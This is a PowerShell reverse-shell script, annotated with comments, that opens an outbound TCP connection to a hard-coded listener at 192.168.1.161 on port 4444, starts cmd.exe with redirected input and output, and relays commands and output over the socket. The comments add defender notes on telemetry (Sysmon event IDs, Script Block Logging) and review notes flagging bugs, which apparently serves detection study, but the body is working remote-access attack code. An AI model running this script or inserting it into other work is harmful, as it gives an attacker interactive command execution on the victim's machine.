Reverse-Shell.ps1
# Tears down the script's two resources and terminates the script.
# Reads the script-scope $client (TcpClient) and $process (System.Diagnostics.Process)
# created further down; nothing is passed in.
# Defender note: the exit path closes the socket and the child cmd.exe process, so
# a lost connection leaves no lingering child on the host — endpoint telemetry for
# the cmd.exe process-termination event will follow closely after the socket closes.
function CleanUp {
# Only close the socket if it is still connected.
if ($client.Connected -eq $true) {
$client.Close()
}
# ExitCode is only readable once the process has exited; if it has, release the handle.
# NOTE(review): for a still-running process, reading ExitCode throws rather than
# returning $null — confirm the intended semantics before relying on this branch.
if ($process.ExitCode -ne $null) {
$process.Close()
}
# Ends the whole script (not just the function).
exit
}
# Main script body: opens an outbound TCP connection to a hard-coded address, starts
# cmd.exe with redirected standard input/output, and relays bytes between the socket
# and the child process in a loop until either side goes away.
#
# Defender note — the observable host-side pattern is:
#   1. powershell.exe making an outbound TCP connection to 192.168.1.161:4444
#      (network-connection telemetry, e.g. Sysmon Event ID 3),
#   2. powershell.exe spawning cmd.exe as a child with UseShellExecute disabled and
#      both stdin and stdout redirected (process-creation telemetry, e.g. Sysmon
#      Event ID 1 with parent powershell.exe and child cmd.exe).
#   The destination is a literal in the script, so it is a direct indicator; the
#   parent/child relationship plus the socket is the behavioural one. An egress
#   policy that blocks unexpected outbound ports and Script Block Logging
#   (Event ID 4104) both surface this script before the loop below runs.
$client = New-Object System.Net.Sockets.TcpClient
# Hard-coded listener address and port.
$client.Connect('192.168.1.161', 4444)
# Bail out if the connect did not succeed.
if ($client.Connected -ne $true) {
CleanUp
}
$stream = $client.GetStream();
# Receive buffer sized to the socket's own ReceiveBufferSize.
$buffer = New-Object System.Byte[] $client.ReceiveBufferSize
# Child cmd.exe with stdin/stdout redirected so this script can drive it directly.
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputStream = $process.StandardInput
$outputStream = $process.StandardOutput
# Brief wait so the child has produced its initial banner before it is drained.
Start-Sleep 1
$encoding = New-Object System.Text.AsciiEncoding
# Drain whatever the child has written so far, one character at a time
# (StreamReader.Read() returns one char as an int).
while ($outputStream.Peek() -ne -1) {
$output += $encoding.GetString($outputStream.Read())
}
# Send the collected banner to the remote side.
# NOTE(review): the byte count passed here is $output.Length (characters), which
# only matches the encoded byte length because the encoding is ASCII.
$stream.Write($encoding.GetBytes($output), 0, $output.Length)
$output = $null
# Relay loop: read from the socket, feed the child's stdin, read the child's stdout,
# write it back to the socket. Runs until CleanUp is reached.
while ($true) {
if ($client.Connected -ne $true) {
CleanUp
}
$pos = 0
$i = 1
# Accumulate socket bytes into $buffer; $i is never changed below, so this inner
# loop is bounded by the buffer filling or the break on the next check.
while (($i -gt 0) -and ($pos -lt $buffer.Length)) {
$read = $stream.Read($buffer, $pos, $buffer.Length - $pos)
$pos += $read
# Stop at a newline (byte 10). NOTE(review): $nb is not assigned anywhere in the
# visible script, so this check does not inspect $buffer as its shape suggests.
if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {
break
}
if ($pos -gt 0) {
# Decode the received bytes and hand them to the child's stdin.
$string = $encoding.GetString($buffer, 0, $pos)
$inputStream.Write($string)
Start-Sleep 1
# ExitCode is readable only after the child has exited; treat that as end of session.
if ($process.ExitCode -ne $null) {
CleanUp
} else {
# Collect the child's output, dropping it if it merely echoes the input line.
$output = $encoding.GetString($outputStream.Read())
while ($outputStream.Peek() -ne -1) {
$output += $encoding.GetString($outputStream.Read())
if ($output -eq $string) {
$output = ''
}
}
# Return the child's output over the socket (ASCII, so char count == byte count).
$stream.Write($encoding.GetBytes($output), 0, $output.Length);
$output = $null
$string = $null
}
} else {
# A zero-length read means the peer closed the connection.
CleanUp
}
}
}